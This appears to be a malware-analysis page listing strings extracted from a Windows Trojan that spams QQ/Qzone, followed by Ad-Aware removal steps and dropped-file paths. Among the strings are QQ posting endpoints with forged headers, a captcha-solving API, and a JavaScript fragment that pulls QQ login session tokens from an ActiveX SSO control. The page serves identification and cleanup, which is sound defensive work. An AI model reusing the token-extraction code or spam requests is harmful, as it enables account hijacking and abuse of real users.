&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=

&blogid=

qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=

1970-01-01 08:00:00

hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=

&type=4&url=

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36

Origin: hXXp://sns.qzone.qq.com

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=

&clientkey=

&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=

ptui_qlogin_CB(

&source=2&extparam={"client_type":4}&bkn=

Host: buluo.qq.com

Origin: hXXp://buluo.qq.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661

hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post

hXXp://captcha.qq.com/getimage?aid=716013036&v=0.

c:/teset.jpg

17004455

hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2

hXXp://union.uc916.com/zone/list

hXXp://buluo.qq.com/p/detail.html?bid=

&like=1&source=2&extparam={"client_type":4}&r=0.

hXXp://buluo.qq.com/cgi-bin/bar/post/like

","pic_list":[{"url":"

&coordinate=1&source=2&extparam={"client_type":4}&pid=

hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2

------WebKitFormBoundarya59o1fM4ajrut49e

Content-Disposition: form-data; name="file"; filename="1.jpg"

------WebKitFormBoundarya59o1fM4ajrut49e--

Host: upload.buluo.qq.com

Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e

Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html

hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload

url":"

hXXp://union.uc916.com/zone/del?userId=

c:\windows\iextadd.dat

\delext .bat

var t=$.activetxsso,e=t.CreateTXSSOData();

t.InitSSOFPTCtrl(0,e);

var i=t.DoOperation(1,e);

for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;

var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;

g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)

m=a.GetWord("wSSO_Account_wFaceIndex")

_=a.GetStr("strSSO_Account_strNickName")

for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;

var k=v.GetAt(b).toString("16");

1==k.length&&(k="0" k),w =k

document.body.innerHTML=qq754497519();

hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com

hXXp://api.ruokuai.com/register.xml

hXXp://api.ruokuai.com/info.xml

hXXp://api.ruokuai.com/recharge.xml

hXXp://api.ruokuai.com/create.xml

hXXp://api.ruokuai.com/reporterror.xml

VBScript.RegExp

MSScriptControl.ScriptControl

if (typeof Date.prototype.toJSON !== 'function') {

Date.prototype.toJSON = function (key) {

return isFinite(this.valueOf()) ?

this.getUTCFullYear()   '-'  

f(this.getUTCMonth()   1)   '-'  

f(this.getUTCDate())   'T'  

f(this.getUTCHours())   ':'  

f(this.getUTCMinutes())   ':'  

f(this.getUTCSeconds())   'Z' : null;

String.prototype.toJSON =

Number.prototype.toJSON =

Boolean.prototype.toJSON = function (key) {

return this.valueOf();

'"' : '\\"',

'\\': '\\\\'

escapable.lastIndex = 0;

return escapable.test(string) ? '"'   string.replace(escapable, function (a) {

'\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);

function str(key, holder) {

// Produce a string from holder[key].

k, // The member key.

value = holder[key];

typeof value.toJSON === 'function') {

value = value.toJSON(key);

value = rep.call(holder, key, value);

if (Object.prototype.toString.apply(value) === '[object Array]') {

length = value.length;

// Join all of the elements together, separated with commas, and wrap them in

v = partial.length === 0 ? '[]' : gap ?

'[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']' :

'['   partial.join(',')   ']';

length = rep.length;

partial.push(quote(k)   (gap ? ': ' : ':')   v);

// Otherwise, iterate through all of the keys in the object.

if (Object.prototype.hasOwnProperty.call(value, k)) {

// Join all of the member texts together, separated with commas,

v = partial.length === 0 ? '{}' : gap ?

'{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}' :

'{'   partial.join(',')   '}';

if (typeof JSON.stringify !== 'function') {

JSON.stringify = function (value, replacer, space) {

// that can replace values, or an array of strings that will select the keys.

typeof replacer.length !== 'number')) {

throw new Error('JSON.stringify');

// Make a fake root object containing our value under the key of ''.

if (typeof JSON.parse !== 'function') {

JSON.parse = function (text, reviver) {

function walk(holder, key) {

var k, v, value = holder[key];

if (Object.prototype.hasOwnProperty.call(value, k)) {

return reviver.call(holder, key, value);

// Parsing happens in four stages. In the first stage, we replace certain

cx.lastIndex = 0;

if (cx.test(text)) {

text = text.replace(cx, function (a) {

('0000'   a.charCodeAt(0).toString(16)).slice(-4);

// We split the second stage into 4 regexp operations in order to work around

.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')

.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')

.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {

// JavaScript structure. The '{' operator is subject to a syntactic ambiguity

// In the optional fourth stage, we recursively walk the new structure, passing

throw new SyntaxError('JSON.parse');

// These forms are obsolete. It is recommended that JSON.stringify and

// JSON.parse be used instead.

if (!Object.prototype.toJSONString) {

Object.prototype.toJSONString = function (filter) {

return JSON.stringify(this, filter);

Object.prototype.parseJSON = function (filter) {

return JSON.parse(this, filter);

JSON.stringify(

.push(

.map)'){

.splice(

) {ary=ary  key ','; }

var ary=''; for (var key in

&password=

application/x-www-form-urlencoded

&softkey=

Content-Disposition: form-data; name="password"

{pass}

Content-Disposition: form-data; name="softkey"

{softkey}

Content-Disposition: form-data; name="image"; filename="System.Byte[]"

SetClientCertificate

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

?456789:;<=

!"#$%&'()* ,-./0123

F%*.*f

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

MSH_SCROLL_LINES_MSG

MSWHEEL_ROLLMSG

Broken pipe

Inappropriate I/O control operation

Operation not permitted

RASAPI32.dll

WinExec

GetWindowsDirectoryA

GetViewportOrgEx

WINMM.dll

ShellExecuteA

OLEAUT32.dll

oledlg.dll

WS2_32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

CreateDialogIndirectParamA

GetViewportExtEx

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

:%d) |

%I64d%s

:0{}%s

:%d)%s

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

zcÁ

#include "l.chs\afxres.rc" // Standard components

z>kernel32.dll

Comdlg32.dll

program internal error number is %d.

:"%s"

:"%s".

;3 #>6.&

'2, / 0&7!4-)1#

c:\windows\1kmu.exe

(*.*)

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:3380

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Windows\winhelp.ini (381 bytes)
   C:\Windows\0cm7.dll (50 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\udp[1].htm (31 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\fs[1].htm (52 bytes)
   C:\Windows\System32\ML4v.txt (31 bytes)
   C:\Windows\System32\JiTG.txt (52 bytes)
   C:\Windows\1kmu.exe (50 bytes)
   C:\Windows\System32\6298.txt (31 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.